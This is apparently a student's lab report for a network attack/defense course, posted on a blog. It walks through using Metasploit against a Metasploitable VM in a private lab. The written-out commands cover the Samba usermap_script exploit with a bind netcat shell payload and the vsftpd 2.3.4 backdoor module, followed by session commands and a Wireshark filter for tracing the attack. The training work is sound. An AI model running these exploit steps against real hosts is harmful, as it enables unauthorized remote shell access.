luxy2121

导航

# 20252920 2025-2026-2 《网络攻防实践》实践7报告

1.实践内容

(1)使用Metasploit进行Linux远程渗透攻击
任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;

②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);

④设置渗透攻击参数(RHOST,LHOST,TARGET等);

⑤执行渗透攻击;

⑥查看是否正确得到远程Shell,并查看获得的权限。

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

(1)使用Metasploit进行Linux远程渗透攻击

使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

虚拟机 IP
kali 192.168.200.3
Metasploit 192.168.200.8

image

image

使用ping命令检查二者是否连通,可以看到能够正常连通。

image

然后在kali虚拟机输入msfconsole启动Metasploit渗透软件

image

然后再输入命令search samba查找要使用的漏洞模块

image

输入命令search usermap_script查找到要使用的usermap_script安全漏洞

image

输入命令use exploit/multi/samba/usermap_script使用渗透攻击模块

image

输入命令show payloads查看与该渗透攻击模块相兼容的攻击载荷

image

输入命令set payload cmd/unix/bind_netcat设置攻击载荷为bind_netcat,输入命令options查看需配置的参数

image

输入命令与对应的靶机和攻击机IP地址,将Metasploitable虚拟机设置为靶机,将kali虚拟机设置为攻击机set LHOST 192.168.200.6 set RHOST 192.168.200.11

image

输入exploit开始攻击

image

输入ifconfig查看网络信息,显示的是靶机的网络信息(IP地址192.168.200.11),攻击成功

image

2.2 攻防对抗实践

在 msfconsole 中执行以下命令,搜索 vsftpd 漏洞对应的攻击模块:

执行命令search vsftpd

image

搜索结果中,定位到 exploit/unix/ftp/vsftpd_234_backdoor模块,执行 use 命令加载:

use exploit/unix/ftp/vsftpd_234_backdoor

image

执行 show payloads 查看支持的载荷,选择适配的交互载荷并配置核心参数:

配置靶机

set RHOSTS 192.168.200.10

image

同步开启 Wireshark 流量捕获

打开 Wireshark,选择攻击机与靶机通信的虚拟网卡,设置显示过滤规则:

ip.addr == 192.168.200.6 && ip.addr == 192.168.200.10

点击开始捕获,同步记录攻击全流程的网络流量。

执行攻击并完成靶机操作

参数配置无误后,执行exploit命令发起攻击:

执行命令后提示:Exploit completed, but no session was created.

在当前模块命令行里输入:sessions -l

你会看到一个 1 号会话,状态是 shell,就是你刚才触发的那个后门会话。

sessions -i 1

image

攻击成功后,获得靶机的交互式 Shell,执行以下操作完成对靶机的控制:

验证权限 whoami

查看靶机信息uname -a

进入用户目录创建测试文件cd /home

mkdir attack_verify

echo "vsftpd attack success" > attack_log.txt

查看文件创建结果 ls

image

Wireshark 攻击流量分析与溯源

攻击完成后,停止 Wireshark 流量捕获,对流量包进行深度分析,完成攻击全链路溯源:

shell会话建立阶段

image

攻击过程

image

3.学习中遇到的问题及解决

实验中靶机ping不通,修改原本的靶机IP地址到同一网段

Metasploitable 虚拟机修改桥接模式之后无法改变IP地址 解决方案:更换网络之后重启虚拟机,ip地址已更改

4.实践总结

经由本次实验,知晓了一些有关linux安全攻防及部分漏洞的知识。借由对其他主机展开攻击,并夺取控制权的过程,深化了对所学知识的领会,且通过实践操作和查阅资料,提升了动手与实践的能力。然而,同时也存在诸多不足之处,仍需继续学习。

posted on 2026-05-06 16:33  20252920卢兴宇  阅读(6)  评论(0)    收藏  举报